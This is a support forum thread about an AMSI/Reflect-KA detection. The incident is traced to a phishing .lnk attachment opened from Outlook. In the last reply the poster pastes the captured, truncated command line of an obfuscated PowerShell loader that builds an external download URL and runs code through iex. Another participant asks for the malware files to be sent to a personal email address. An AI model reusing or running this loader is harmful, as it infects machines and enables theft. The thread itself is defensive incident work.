Thread Info
  • State Suggested Answer
  • Locked Locked
  • Replies 8 replies
  • Answers 1 answer
  • Subscribers 13 subscribers
  • Views 6909 views
  • Users 0 members are here
Options
Suggested
This discussion has been locked.
You can no longer post new replies to this discussion. If you have a question you can start a new discussion

AMSI/Reflect-KA Detection

Jones Malhotra

Hello everyone,

We get the following alert

What happened: We could not clean up a threat.

Where it happened: computer name

Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

What was detected: AMSI/Reflect-KA

How severe it is: High

What Sophos has done so far: We attempted to clean up a threat.

It is for only for one users, used to be two. I cleaned the temp files for both users on their respective PCs, and it seems that fixed the issue for the first user, or maybe just a coincidence.

However this one user's account on this PC keep giving us this detection.

Seems to be triggered by two different things, but they all lead to powershell.

Please see the images, hope that helps.

Any idea about this. Much appreciated.



This thread was automatically locked due to age.
  • 0

    Hi Jones Malhotra,

    Thanks for reaching out to the Sophos Community Forum. 

    For one of these detections, it looks like a file "imf & bmf pre-filing practitioner relief fy2023.xls.lnk" file was accessed via outlook, triggering powershell.exe. I'd suggest inquiring with the end-user if they received any suspicious emails or clicked any potentially malicious links via Outlook. 

    If you haven't already, I'd suggest looking into Sophos Phish threat, as it seems a phishing attempt was made against one of your end-users. You can also start a trial for Phish Threat directly from Sophos Central to try it out for 30 at no cost. The trail can also be extended to 60 days. 

    Kushal Lakhan
    Team Lead, Global Community Support
    Connect with Sophos Support, get alerted, and be informed.
    If a post solves your question, please use the "Verify Answer" button.
    The New Home of Sophos Support Videos!  Visit Sophos Techvids
  • 0 in reply to Qoosh

    Hi Kushal,

    That is one of the triggers though?

    Do you know what Reflect-KA is?

    Thanks

  • 0 in reply to Jones Malhotra

    Yes, a malicious link or attachment via email seems to be where this detection originated. 

    The Reflect-KA detection will trigger when obfuscated powershell code attempts to download a specific malicious payload.

    Kushal Lakhan
    Team Lead, Global Community Support
    Connect with Sophos Support, get alerted, and be informed.
    If a post solves your question, please use the "Verify Answer" button.
    The New Home of Sophos Support Videos!  Visit Sophos Techvids
  • 0

    (imf & bmf pre-filing practitioner relief fy2023.xlsx.Ink) & (psscriptpolicytest_J3jkuxiu.1gn.ps1) It seems that this is a no-file attack, please find the above file in the attacked host, and then package and send to my email Thank you, pay attention to the real target file of the.ink file.My email is 1928530784@qq.com

  • 0

    Please click on Microsoft Powershell at the top of the chart and look at the window on the right to see what is the command line

  • 0 in reply to Qoosh

    I'm curious why HMPA didn't trigger Lockdown.The program has clearly performed beyond its original purpose, executing ps1

  • 0 in reply to ong! L

    Hello,

    Thanks for your response

    This is what I got

    "C:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Throug9 ([String]$Gastrocele){$Navigatr = 'su'+'bstring';For($Dakshe=1; $Dakshe -lt $Gastrocele.Length-1; $Dakshe+=(1+1)){$Traadethv=$Traadethv+$Gastrocele.$Navigatr.Invoke($Dakshe, 1)};$Traadethv;}$Reticu=Throug9 ' hRtftRpKs :S/ /Tl eBd sDhDeHe t m eKtCaYlu.DcKosm /TZ ZSZ /AETmEpAoCrMtTm .TiKnMfU ';$Traadethv01=Throug9 ' i e xD ';$Mlkevej = Throug9 ' \ s y sGwSo wL6F4P\MWMi nFdHoOwGsDP oDw e r SJhKe lRl \ vR1S.S0P\ pMoAwPeCrRs hCe l la.Ue xFeE ';.($Traadethv01) (Throug9 ' $STMaKb sSl i sCtSeA2S=I$KeOn v : wBiCnSdSi r ') ;.($Traadethv01) (Throug9 'P$ M lTk eLvEe jD= $CTEahbNsOl iSs tUe 2R+K$ MSl kAeCvPeEjM ') ;.($Traadethv01) (Throug9 'B$ VBr gheNlFsBh eRdSsB M=O (D(OgSw mSiU w i nG3 2 _VpFrUoTcSe sPs B-aFS VPDr o cSeFsosNIIdK= $ { PDI D }a)T. CCoDm mVa n d LNi n eT)u - s p l ibtL K[Nc hSaQr ] 3f4 ');.($Traadethv01) (Throug9 's$FJPu dEiT t= F$ VKr g e l sSh eBdEsT[ $ VPrNg e lssVh eSd s . cCoGuOnFt -S2O] ');.($Traadethv01) (Throug9

    Many Thanks

Unfiltered HTML
Help Us Improve The Community
Unfiltered HTML